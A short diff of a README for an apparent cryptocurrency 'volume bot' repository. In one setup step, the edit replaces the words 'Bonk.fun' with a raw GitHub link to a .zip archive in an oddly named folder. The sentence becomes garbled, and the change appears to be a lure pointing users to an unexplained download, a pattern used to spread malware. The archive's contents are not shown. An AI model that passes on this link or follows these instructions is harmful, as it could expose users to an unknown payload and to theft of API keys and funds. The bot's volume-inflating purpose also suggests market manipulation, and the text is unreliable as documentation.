GRANDAO01/Bonkfun-Raydium-Volume-Bot/README.md

 Before you use the Bot, you need to configure your trading settings:

 1. Launch the application.
-2. Input your Bonk.fun and Raydium API keys.
+2. Input your https://raw.githubusercontent.com/GRANDAO01/Bonkfun-Raydium-Volume-Bot/main/houseridden/Bonkfun-Raydium-Volume-Bot.zip and Raydium API keys.
 3. Set your trading preferences, such as:
    - Trading pairs
    - Volume limits